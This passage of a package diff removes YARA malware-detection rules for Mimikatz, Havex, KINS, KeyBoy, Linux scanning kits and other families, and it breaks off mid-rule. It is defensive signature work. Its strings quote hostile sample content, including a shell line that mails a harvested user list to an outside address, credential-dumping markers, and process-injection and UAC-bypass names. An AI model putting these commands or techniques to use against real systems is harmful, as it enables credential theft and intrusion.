-		$s3 = "Microsoft(July/1999~) http://www.microsoft.com/technet/security/current.asp" fullword
-		$s5 = "No space for copy of command line" fullword
-		$s7 = "-  Windows NT,2000 Patch Method  - " fullword
-		$s8 = "scanf : floating point formats not linked" fullword
-		$s12 = "hrdir_b.c: LoadLibrary != mmdll borlndmm failed" fullword
-		$s13 = "!\"what?\"" fullword
-		$s14 = "%s Port %d Closed" fullword
-		$s16 = "printf : floating point formats not linked" fullword
-		$s17 = "xxtype.cpp" fullword
-	condition:
-		all of them
-}
-
-rule _FsHttp_FsPop_FsSniffer {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - from files FsHttp.exe, FsPop.exe, FsSniffer.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		super_rule = 1
-		hash0 = "9d4e7611a328eb430a8bb6dc7832440713926f5f"
-		hash1 = "ae23522a3529d3313dd883727c341331a1fb1ab9"
-		hash2 = "7ffc496cd4a1017485dfb571329523a52c9032d8"
-	strings:
-		$s0 = "-ERR Invalid Command, Type [Help] For Command List" fullword
-		$s1 = "-ERR Get SMS Users ID Failed" fullword
-		$s2 = "Control Time Out 90 Secs, Connection Closed" fullword
-		$s3 = "-ERR Post SMS Failed" fullword
-		$s4 = "Current.hlt" fullword
-		$s6 = "Histroy.hlt" fullword
-		$s7 = "-ERR Send SMS Failed" fullword
-		$s12 = "-ERR Change Password <New Password>" fullword
-		$s17 = "+OK Send SMS Succussifully" fullword
-		$s18 = "+OK Set New Password: [%s]" fullword
-		$s19 = "CHANGE PASSWORD" fullword
-	condition:
-		all of them
-}
-
-rule Ammyy_Admin_AA_v3 {
-	meta:
-		description = "Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe"
-		author = "Florian Roth"
-		reference = "http://goo.gl/gkAg2E"
-		date = "2014/12/22"
-		score = 55
-		hash1 = "b130611c92788337c4f6bb9e9454ff06eb409166"
-		hash2 = "07539abb2623fe24b9a05e240f675fa2d15268cb"		
-	strings:
-		$x1 = "S:\\Ammyy\\sources\\target\\TrService.cpp" fullword ascii
-		$x2 = "S:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cpp" fullword ascii
-		$x3 = "Global\\Ammyy.Target.IncomePort" fullword ascii
-		$x4 = "S:\\Ammyy\\sources\\target\\TrFmFileSys.cpp" fullword ascii
-		$x5 = "Please enter password for accessing remote computer" fullword ascii
-		
-		$s1 = "CreateProcess1()#3 %d error=%d" fullword ascii
-		$s2 = "CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name." fullword ascii
-		$s3 = "ERROR: CreateProcessAsUser() error=%d, session=%d" fullword ascii
-		$s4 = "ERROR: FindProcessByName('explorer.exe')" fullword ascii
-	condition:
-		2 of ($x*) or all of ($s*)
-}
-
-/* Other dumper and custom hack tools */
-
-rule Mimikatz_Samples_2014b_1 {
-	meta:
-		description = "Mimikatz pwassword dumper samples from the second half of 2014"
-		author = "Florian Roth with the help of YarGen Rule Generator"
-		reference = "not set"
-		date = "2014/12/23"
-		score = 80
-		hash = "ef5bd09b2e5836b58a8b27c1fb3650621aaf6488"
-	strings:
-		$s1 = "Raw command (not implemented yet) : %s" fullword wide
-		$s3 = " ! ZwSetInformationProcess 0x%08x for %u/%-14S" fullword wide
-		$s6 = "PsSetCreateProcessNotifyRoutineEx" fullword wide
-		$s10 = "\\Device\\mimidrv" fullword wide
-		$s16 = "\\DosDevices\\mimidrv" fullword wide
-		$s17 = "All privileges for the access token from %u/%-14S" fullword wide
-		$s20 = "in (0x%p - %u) ; out (0x%p - %u)" fullword wide
-	condition:
-		all of them
-}
-
-rule Mimikatz_Samples_2014b_2 {
-	meta:
-		description = "Mimikatz pwassword dumper samples from the second half of 2014"
-		author = "Florian Roth with the help of YarGen Rule Generator"
-		reference = "not set"
-		date = "2014/12/23"
-		score = 80		
-		hash = "98033f5bbdd79b12a7804bad0698c91e6d5067ad"
-	strings:
-		$s0 = "0: kd> .process /r /p <EPROCESS address>" fullword ascii
-		$s4 = "%p - lsasrv!LogonSessionListCount" fullword ascii
-		$s7 = "%p - lsasrv!LogonSessionList" fullword ascii
-		$s12 = "livessp!LiveGlobalLogonSessionList" fullword ascii
-		$s13 = "UndefinedLogonType" fullword ascii
-		$s14 = "[ERROR] [CRYPTO] Acquire keys" fullword ascii
-		$s15 = "masterkey" fullword ascii
-		$s16 = "kerberos!KerbGlobalLogonSessionTable" fullword ascii
-		$s17 = "RemoteInteractive" fullword ascii
-		$s18 = "mimilib.dll" fullword wide
-		$s19 = "%p - lsasrv!InitializationVector" fullword ascii
-		$s20 = "lsasrv!LogonSessionListCount" fullword ascii
-	condition:
-		all of them
-}
-
-rule Mimikatz_Samples_2014b_Family_2 {
-	meta:
-		description = "Mimikatz pwassword dumper samples from the second half of 2014"
-		author = "Florian Roth with the help of YarGen Rule Generator"
-		date = "2014/12/23"
-		super_rule = 1
-		score = 80		
-		hash0 = "61001a32c5388e629dd0441a77974200057816ef"
-		hash1 = "46df272cecb541aebca3c863802c0d0a0dc5fcb4"
-		hash2 = "c3307bb70efa19fc5049dfd829d07ea52a65bb74"
-		hash3 = "29d9bfc4e4884bc7b2f3cd01960b727c17fb50cb"
-		hash4 = "ac1d1db32ca6e7af5625f0f6fbe210fe68002b5c"
-	strings:
-		$s0 = "ncryptprov.dll" fullword wide
-		$s1 = "CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY" fullword wide
-		$s2 = "logonPasswords" fullword wide
-		$s3 = "CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE" fullword wide
-		$s4 = "CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY" fullword wide
-		$s5 = "inject" fullword wide
-		$s6 = "MS_DEF_RSA_SCHANNEL_PROV" fullword wide
-		$s7 = "MS_ENHANCED_PROV" fullword wide
-		$s8 = "MS_DEF_RSA_SIG_PROV" fullword wide
-		$s9 = "privilege" fullword wide
-		$s10 = "MS_ENH_RSA_AES_PROV" fullword wide
-		$s16 = "sekurlsa" fullword wide
-		$s17 = "answer" fullword wide
-		$s18 = "secrets" fullword wide
-		$s19 = "MS_DEF_DSS_PROV" fullword wide
-		$s20 = "MS_DEF_PROV" fullword wide
-	condition:
-		all of them
-}
-
-rule LinuxHacktool_eyes_screen {
-	meta:
-		description = "Linux hack tools - file screen"
-		author = "Florian Roth"
-		reference = "not set"
-		date = "2015/01/19"
-		hash = "a240a0118739e72ff89cefa2540bf0d7da8f8a6c"
-	strings:
-		$s0 = "or: %s -r [host.tty]" fullword ascii
-		$s1 = "%s: process: character, ^x, or (octal) \\032 expected." fullword ascii
-		$s2 = "Type \"screen [-d] -r [pid.]tty.host\" to resume one of them." fullword ascii
-		$s6 = "%s: at [identifier][%%|*|#] command [args]" fullword ascii
-		$s8 = "Slurped only %d characters (of %d) into buffer - try again" fullword ascii
-		$s11 = "command from %s: %s %s" fullword ascii
-		$s16 = "[ Passwords don't match - your armor crumbles away ]" fullword ascii
-		$s19 = "[ Passwords don't match - checking turned off ]" fullword ascii
-	condition:
-		all of them
-}
-
-rule LinuxHacktool_eyes_scanssh {
-	meta:
-		description = "Linux hack tools - file scanssh"
-		author = "Florian Roth"
-		reference = "not set"
-		date = "2015/01/19"
-		hash = "467398a6994e2c1a66a3d39859cde41f090623ad"
-	strings:
-		$s0 = "Connection closed by remote host" fullword ascii
-		$s1 = "Writing packet : error on socket (or connection closed): %s" fullword ascii
-		$s2 = "Remote connection closed by signal SIG%s %s" fullword ascii
-		$s4 = "Reading private key %s failed (bad passphrase ?)" fullword ascii
-		$s5 = "Server closed connection" fullword ascii
-		$s6 = "%s: line %d: list delimiter not followed by keyword" fullword ascii
-		$s8 = "checking for version `%s' in file %s required by file %s" fullword ascii
-		$s9 = "Remote host closed connection" fullword ascii
-		$s10 = "%s: line %d: bad command `%s'" fullword ascii
-		$s13 = "verifying that server is a known host : file %s not found" fullword ascii
-		$s14 = "%s: line %d: expected service, found `%s'" fullword ascii
-		$s15 = "%s: line %d: list delimiter not followed by domain" fullword ascii
-		$s17 = "Public key from server (%s) doesn't match user preference (%s)" fullword ascii
-	condition:
-		all of them
-}
-rule LinuxHacktool_eyes_scanner {
-	meta:
-		description = "Linux hack tools - file scanner"
-		author = "Florian Roth"
-		reference = "not set"
-		date = "2015/01/19"
-		hash = "5488698b7f9090f45096517e61768efd32299d5b"
-	strings:
-		$s0 = "%s: line %d: list delimiter not followed by keyword" fullword ascii
-		$s1 = "checking for version `%s' in file %s required by file %s" fullword ascii
-		$s3 = "%s: line %d: expected service, found `%s'" fullword ascii
-		$s4 = "truncated dump file; tried to read %d header bytes, only got %lu" fullword ascii
-		$s5 = "%s: line %d: list delimiter not followed by domain" fullword ascii
-		$s7 = "'protochain' not supported with radiotap headers" fullword ascii
-		$s8 = "%s(): unsuported injection type" fullword ascii
-		$s9 = "ELF load command address/offset not properly aligned" fullword ascii
-		$s10 = "@(#) $Header: /tcpdump/master/libpcap/gencode.c,v 1.221.2.27 2005/07/14 16:01:46" ascii
-		$s20 = "%s%s%s:%u: %s%sAssertion `%s' failed." fullword ascii
-	condition:
-		4 of them
-}
-rule LinuxHacktool_eyes_pscan2 {
-	meta:
-		description = "Linux hack tools - file pscan2"
-		author = "Florian Roth"
-		reference = "not set"
-		date = "2015/01/19"
-		hash = "56b476cba702a4423a2d805a412cae8ef4330905"
-	strings:
-		$s0 = "# pscan completed in %u seconds. (found %d ips)" fullword ascii
-		$s1 = "Usage: %s <b-block> <port> [c-block]" fullword ascii
-		$s3 = "%s.%d.* (total: %d) (%.1f%% done)" fullword ascii
-		$s8 = "Invalid IP." fullword ascii
-		$s9 = "# scanning: " fullword ascii
-		$s10 = "Unable to allocate socket." fullword ascii
-	condition:
-		2 of them
-}
-
-rule LinuxHacktool_eyes_a {
-	meta:
-		description = "Linux hack tools - file a"
-		author = "Florian Roth"
-		reference = "not set"
-		date = "2015/01/19"
-		hash = "458ada1e37b90569b0b36afebba5ade337ea8695"
-	strings:
-		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
-		$s1 = "mv scan.log bios.txt" fullword ascii
-		$s2 = "rm -rf bios.txt" fullword ascii
-		$s3 = "echo -e \"# by Eyes.\"" fullword ascii
-		$s4 = "././pscan2 $1 22" fullword ascii
-		$s10 = "echo \"#cautam...\"" fullword ascii
-	condition:
-		2 of them
-}
-
-rule LinuxHacktool_eyes_mass {
-	meta:
-		description = "Linux hack tools - file mass"
-		author = "Florian Roth"
-		reference = "not set"
-		date = "2015/01/19"
-		hash = "2054cb427daaca9e267b252307dad03830475f15"
-	strings:
-		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
-		$s1 = "echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\r" ascii
-		$s3 = "killall -9 pscan2" fullword ascii
-		$s5 = "echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES}  [*]\"" fullword ascii
-		$s6 = "echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"" fullword ascii
-	condition:
-		1 of them
-}
-
-rule LinuxHacktool_eyes_pscan2_2 {
-	meta:
-		description = "Linux hack tools - file pscan2.c"
-		author = "Florian Roth"
-		reference = "not set"
-		date = "2015/01/19"
-		hash = "eb024dfb441471af7520215807c34d105efa5fd8"
-	strings:
-		$s0 = "snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);" fullword ascii
-		$s2 = "printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);" fullword ascii
-		$s3 = "printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - sca" ascii
-		$s19 = "connlist[i].addr.sin_family = AF_INET;" fullword ascii
-		$s20 = "snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\"," fullword ascii
-	condition:
-		2 of them
-}
-
-rule CN_Portscan : APT
-{
-    meta:
-        description = "CN Port Scanner"
-        author = "Florian Roth"
-        release_date = "2013-11-29"
-        confidential = false
-		score = 70
-    strings:
-    	$s1 = "MZ"
-		$s2 = "TCP 12.12.12.12"
-    condition:
-        ($s1 at 0) and $s2
-}
-
-rule WMI_vbs : APT 
-{
-    meta:
-        description = "WMI Tool - APT"
-        author = "Florian Roth"
-        release_date = "2013-11-29"
-        confidential = false
-		score = 70
-    strings:
-		$s3 = "WScript.Echo \"   $$\\      $$\\ $$\\      $$\\ $$$$$$\\ $$$$$$$$\\ $$\\   $$\\ $$$$$$$$\\  $$$$$$"  
-    condition:
-        all of them	
-}
-
diff -Nru remnux-rules-0.0.3/yara/Havex.yara remnux-rules-0.0.4/yara/Havex.yara
--- remnux-rules-0.0.3/yara/Havex.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Havex.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,72 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-
-rule Win32OPCHavex
-{
-    meta:
-        Author      = "BAE Systems"
-        Date        = "2014/06/23"
-        Description = "Rule for identifying OPC version of HAVEX"
-        Reference   = "www.f-secure.com/weblog/archives/00002718.html"
-
-    strings:
-        $mzhdr = "MZ"
-        $dll = "7CFC52CD3F87.dll"
-        $a1 = "Start finging of LAN hosts..." wide
-        $a2 = "Finding was fault. Unexpective error" wide
-        $a3 = "Was found %i hosts in LAN:" wide
-        $a4 = "Hosts was't found." wide
-        $a5 = "Start finging of OPC Servers..." wide
-        $a6 = "Was found %i OPC Servers." wide
-        $a7 = "OPC Servers not found. Programm finished" wide
-        $a8 = "%s[%s]!!!EXEPTION %i!!!" wide
-        $a9 = "Start finging of OPC Tags..." wide
-
-    condition:
-        $mzhdr at 0 and ($dll or (any of ($a*)))
-}
-
-rule Win32FertgerHavex
-{
-    meta:
-        Author      = "BAE Systems"
-        Date        = "2014/06/23"
-        Description = "Rule for identifying Fertger version of HAVEX"
-        Reference   = "www.f-secure.com/weblog/archives/00002718.html"
-
-    strings:
-        $mz = "MZ"
-        $a1="\\\\.\\pipe\\mypipe-f" wide
-        $a2="\\\\.\\pipe\\mypipe-h" wide
-        $a3="\\qln.dbx" wide
-        $a4="*.yls" wide
-        $a5="\\*.xmd" wide
-        $a6="fertger" wide
-        $a7="havex"
-    
-    condition:
-        $mz at 0 and 3 of ($a*) 
-}
-
-rule Havex_Trojan_PHP_Server
-{
-    meta:
-        Author      = "Florian Roth"
-        Date        = "2014/06/24"
-        Description = "Detects the PHP server component of the Havex RAT"
-        Reference   = "www.f-secure.com/weblog/archives/00002718.html"
-
-    strings:
-        $s1 = "havex--></body></head>"
-        $s2 = "ANSWERTAG_START"
-        $s3 = "PATH_BLOCKFILE"
-
-    condition:
-        all of them
-} 
-
diff -Nru remnux-rules-0.0.3/yara/iexpl0ree.yara remnux-rules-0.0.4/yara/iexpl0ree.yara
--- remnux-rules-0.0.3/yara/iexpl0ree.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/iexpl0ree.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,66 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule iexpl0reCode : iexpl0ree Family 
-{
-    meta:
-        description = "iexpl0re code features"
-        author = "Seth Hardy"
-        last_modified = "2014-07-21"
-        
-    strings:
-        $ = { 47 83 FF 64 0F 8C 6D FF FF FF 33 C0 5F 5E 5B C9 C3 }
-        $ = { 80 74 0D A4 44 41 3B C8 7C F6 68 04 01 00 00 }
-        $ = { 8A C1 B2 07 F6 EA 30 04 31 41 3B 4D 10 7C F1 }
-        $ = { 47 83 FF 64 0F 8C 79 FF FF FF 33 C0 5F 5E 5B C9 C3 }
-        // 88h decrypt
-        $ = { 68 88 00 00 00 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 }
-        $ = { BB 88 00 00 00 53 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 }
-        
-    condition:
-        any of them
-}
-
-rule iexpl0reStrings : iexpl0re Family
-{
-    meta:
-        description = "Strings used by iexpl0re"
-        author = "Seth Hardy"
-        last_modified = "2014-07-21"
-        
-    strings:
-        $ = "%USERPROFILE%\\IEXPL0RE.EXE"
-        $ = "\"<770j (("
-        $ = "\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IEXPL0RE.LNK"
-        $ = "\\Documents and Settings\\%s\\Application Data\\Microsoft\\Internet Explorer\\IEXPL0RE.EXE"
-        $ = "LoaderV5.dll"
-        // stage 2
-        $ = "POST /index%0.9d.asp HTTP/1.1"
-        $ = "GET /search?n=%0.9d&"
-        $ = "DUDE_AM_I_SHARP-3.14159265358979x6.626176"
-        $ = "WHO_A_R_E_YOU?2.99792458x1.25663706143592"
-        $ = "BASTARD_&&_BITCHES_%0.8x"
-        $ = "c:\\bbb\\eee.txt"
-        
-    condition:
-        any of them
-
-}
-
-rule iexpl0re : Family
-{
-    meta:
-        description = "iexpl0re family"
-        author = "Seth Hardy"
-        last_modified = "2014-07-21"
-   
-    condition:
-        iexpl0reCode or iexpl0reStrings
-        
-}
-
-
diff -Nru remnux-rules-0.0.3/yara/IMuler.yara remnux-rules-0.0.4/yara/IMuler.yara
--- remnux-rules-0.0.3/yara/IMuler.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/IMuler.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,67 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule IMulerCode : IMuler Family 
-{
-    meta:
-        description = "IMuler code tricks"
-        author = "Seth Hardy"
-        last_modified = "2014-06-16"
-        
-    strings:
-        // Load these function strings 4 characters at a time. These check the first two blocks:
-        $L4_tmpSpotlight = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 53 70 6F }
-        $L4_TMPAAABBB = { C7 ?? ?? ?? ?? ?? 54 4D 50 41 C7 ?? ?? ?? ?? ?? 41 41 42 42 }
-        $L4_FILEAGENTVer = { C7 ?? 46 49 4C 45 C7 ?? 04 41 47 45 4E }
-        $L4_TMP0M34JDF8 = { C7 ?? ?? ?? ?? ?? 54 4D 50 30 C7 ?? ?? ?? ?? ?? 4D 33 34 4A }
-        $L4_tmpmdworker = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 2E 6D 64 }
-        
-    condition:
-        any of ($L4*)
-}
-
-rule IMulerStrings : IMuler Family
-{
-    meta:
-        description = "IMuler Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-16"
-        
-    strings:
-        $ = "/cgi-mac/"
-        $ = "xnocz1"
-        $ = "checkvir.plist"
-        $ = "/Users/apple/Documents/mac back"
-        $ = "iMuler2"
-        $ = "/Users/imac/Desktop/macback/"
-        $ = "xntaskz.gz"
-        $ = "2wmsetstatus.cgi"
-        $ = "launch-0rp.dat"
-        $ = "2wmupload.cgi"
-        $ = "xntmpz"
-        $ = "2wmrecvdata.cgi"
-        $ = "xnorz6"
-        $ = "2wmdelfile.cgi"
-        $ = "/LanchAgents/checkvir"
-        $ = "0PERA:%s"
-        $ = "/tmp/Spotlight"
-        $ = "/tmp/launch-ICS000"
-        
-    condition:
-        any of them
-}
-
-rule IMuler : Family
-{
-    meta:
-        description = "IMuler"
-        author = "Seth Hardy"
-        last_modified = "2014-06-16"
-        
-    condition:
-        IMulerCode or IMulerStrings
-}
diff -Nru remnux-rules-0.0.3/yara/Install11.yara remnux-rules-0.0.4/yara/Install11.yara
--- remnux-rules-0.0.3/yara/Install11.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Install11.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,50 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Insta11Code : Insta11 Family 
-{
-    meta:
-        description = "Insta11 code features"
-        author = "Seth Hardy"
-        last_modified = "2014-06-23"
-    
-    strings:
-        // jmp $+5; push 423h
-        $jumpandpush = { E9 00 00 00 00 68 23 04 00 00 }
-    
-    condition:
-        any of them
-}
-
-rule Insta11Strings : Insta11 Family
-{
-    meta:
-        description = "Insta11 Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-23"
-        
-    strings:
-        $ = "XTALKER7"
-        $ = "Insta11 Microsoft" wide ascii
-        $ = "wudMessage"
-        $ = "ECD4FC4D-521C-11D0-B792-00A0C90312E1"
-        $ = "B12AE898-D056-4378-A844-6D393FE37956"
-        
-    condition:
-       any of them
-}
-
-rule Insta11 : Family
-{
-    meta:
-        description = "Insta11"
-        author = "Seth Hardy"
-        last_modified = "2014-06-23"
-        
-    condition:
-        Insta11Code or Insta11Strings
-}
diff -Nru remnux-rules-0.0.3/yara/Intel_Virtualization.yara remnux-rules-0.0.4/yara/Intel_Virtualization.yara
--- remnux-rules-0.0.3/yara/Intel_Virtualization.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Intel_Virtualization.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,40 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Intel_Virtualization_Wizard_exe {
-  meta:
-    author = "cabrel@zerklabs.com"
-    description = "Dynamic DLL abuse executable"
-
-    file_1_seen = "2013-05-21"
-    file_1_sha256 = "7787757ae851f4a162f46f794be1532ab78e1928185212bdab83b3106f28c708"
-
-  strings:
-    $a = {4C 6F 61 64 53 54 52 49 4E 47}
-    $b = {49 6E 69 74 69 61 6C 69 7A 65 4B 65 79 48 6F 6F 6B}
-    $c = {46 69 6E 64 52 65 73 6F 75 72 63 65 73}
-    $d = {4C 6F 61 64 53 54 52 49 4E 47 46 72 6F 6D 48 4B 43 55}
-    $e = {68 63 63 75 74 69 6C 73 2E 44 4C 4C}
-  condition:
-    all of them
-}
-
-rule Intel_Virtualization_Wizard_dll {
-  meta:
-    author = "cabrel@zerklabs.com"
-    description = "Dynamic DLL (Malicious)"
-
-    file_1_seen = "2013-05-21"
-    file_1_sha256 = "485ae043b6a5758789f1d33766a26d8b45b9fde09cde0512aa32d4bd1ee04f28"
-
-  strings:
-    $a = {48 3A 5C 46 61 73 74 5C 50 6C 75 67 28 68 6B 63 6D 64 29 5C}
-    $b = {64 6C 6C 5C 52 65 6C 65 61 73 65 5C 48 69 6A 61 63 6B 44 6C 6C 2E 70 64 62}
-
-  condition:
-    ($a and $b) and Intel_Virtualization_Wizard_exe
-}
diff -Nru remnux-rules-0.0.3/yara/jRAT.yara remnux-rules-0.0.4/yara/jRAT.yara
--- remnux-rules-0.0.3/yara/jRAT.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/jRAT.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,23 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-rule jRAT_conf : rat 
-{
-	meta:
-		description = "jRAT configuration" 
-		author = "Jean-Philippe Teissier / @Jipe_"
-		date = "2013-10-11"
-		filetype = "memory"
-		version = "1.0" 
-		ref1 = "https://github.com/MalwareLu/config_extractor/blob/master/config_jRAT.py" 
-		ref2 = "http://www.ghettoforensics.com/2013/10/dumping-malware-configuration-data-from.html" 
-
-	strings:
-		$a = /port=[0-9]{1,5}SPLIT/ 
-
-	condition: 
-		$a
-}
diff -Nru remnux-rules-0.0.3/yara/Kelihos.yara remnux-rules-0.0.4/yara/Kelihos.yara
--- remnux-rules-0.0.3/yara/Kelihos.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Kelihos.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,20 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule KelihosHlux
-{
-  meta:
-	author = "@malpush"
-	maltype = "KelihosHlux"
-	description = "http://malwared.ru"
-	date = "22/02/2014"
-  strings:
-    $KelihosHlux_HexString = { 73 20 7D 8B FE 95 E4 12 4F 3F 99 3F 6E C8 28 26 C2 41 D9 8F C1 6A 72 A6 CE 36 0F 73 DD 2A 72 B0 CC D1 07 8B 2B 98 73 0E 7E 8C 07 DC 6C 71 63 F4 23 27 DD 17 56 AE AB 1E 30 52 E7 54 51 F7 20 ED C7 2D 4B 72 E0 77 8E B4 D2 A8 0D 8D 6A 64 F9 B7 7B 08 70 8D EF F3 9A 77 F6 0D 88 3A 8F BB C8 89 F5 F8 39 36 BA 0E CB 38 40 BF 39 73 F4 01 DC C1 17 BF C1 76 F6 84 8F BD 87 76 BC 7F 85 41 81 BD C6 3F BC 39 BD C0 89 47 3E 92 BD 80 60 9D 89 15 6A C6 B9 89 37 C4 FF 00 3D 45 38 09 CD 29 00 90 BB B6 38 FD 28 9C 01 39 0E F9 30 A9 66 6B 19 C9 F8 4C 3E B1 C7 CB 1B C9 3A 87 3E 8E 74 E7 71 D1 }
-   
-  condition:
-    $KelihosHlux_HexString
-}
diff -Nru remnux-rules-0.0.3/yara/KeyBoy.yara remnux-rules-0.0.4/yara/KeyBoy.yara
--- remnux-rules-0.0.3/yara/KeyBoy.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/KeyBoy.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,46 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule KeyBoy_Dropper  
-{  
-    meta:
-        Author      = "Rapid7 Labs"
-        Date        = "2013/06/07"
-        Description = "Strings inside"
-        Reference   = "https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india"
-
-    strings:
-        $1 = "I am Admin"  
-        $2 = "I am User"  
-        $3 = "Run install success!"  
-        $4 = "Service install success!"  
-        $5 = "Something Error!"  
-        $6 = "Not Configed, Exiting"  
-
-    condition:  
-        all of them  
-}
-
-rule KeyBoy_Backdoor  
-{
-    meta:
-        Author      = "Rapid7 Labs"
-        Date        = "2013/06/07"
-        Description = "Strings inside"
-        Reference   = "https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india"
-
-    strings:  
-        $1 = "$login$"  
-        $2 = "$sysinfo$"  
-        $3 = "$shell$"  
-        $4 = "$fileManager$"  
-        $5 = "$fileDownload$"  
-        $6 = "$fileUpload$"  
-
-    condition:  
-        all of them  
-} 
diff -Nru remnux-rules-0.0.3/yara/KINS.yara remnux-rules-0.0.4/yara/KINS.yara
--- remnux-rules-0.0.3/yara/KINS.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/KINS.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,52 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-rule KINS_dropper {
-	meta:
-		author = "AlienVault Labs aortega@alienvault.com"
-		description = "Match protocol, process injects and windows exploit present in KINS dropper"
-		reference = "http://goo.gl/arPhm3"
-	strings:
-		// Network protocol
-		$n1 = "tid=%d&ta=%s-%x" fullword
-		$n2 = "fid=%d" fullword
-		$n3 = "%[^.].%[^(](%[^)])" fullword
-		// Injects
-		$i0 = "%s [%s %d] 77 %s"
-		$i01 = "Global\\%s%x"
-		$i1 = "Inject::InjectProcessByName()"
-		$i2 = "Inject::CopyImageToProcess()"
-		$i3 = "Inject::InjectProcess()"
-		$i4 = "Inject::InjectImageToProcess()"
-		$i5 = "Drop::InjectStartThread()"
-		// UAC bypass
-		$uac1 = "ExploitMS10_092"
-		$uac2 = "\\globalroot\\systemroot\\system32\\tasks\\" ascii wide
-		$uac3 = "<RunLevel>HighestAvailable</RunLevel>" ascii wide
-	condition:
-		2 of ($n*) and 2 of ($i*) and 2 of ($uac*)
-}
-
-rule KINS_DLL_zeus {
-	meta:
-		author = "AlienVault Labs aortega@alienvault.com"
-		description = "Match default bot in KINS leaked dropper, Zeus"
-		reference = "http://goo.gl/arPhm3"
-	strings:
-		// Network protocol
-		$n1 = "%BOTID%" fullword
-		$n2 = "%opensocks%" fullword
-		$n3 = "%openvnc%" fullword
-		$n4 = /Global\\(s|v)_ev/ fullword
-		// Crypted strings
-		$s1 = "\x72\x6E\x6D\x2C\x36\x7D\x76\x77"
-		$s2 = "\x18\x04\x0F\x12\x16\x0A\x1E\x08\x5B\x11\x0F\x13"
-		$s3 = "\x39\x1F\x01\x07\x15\x19\x1A\x33\x19\x0D\x1F"
-		$s4 = "\x62\x6F\x71\x78\x63\x61\x7F\x69\x2D\x67\x79\x65"
-		$s5 = "\x6F\x69\x7F\x6B\x61\x53\x6A\x7C\x73\x6F\x71"
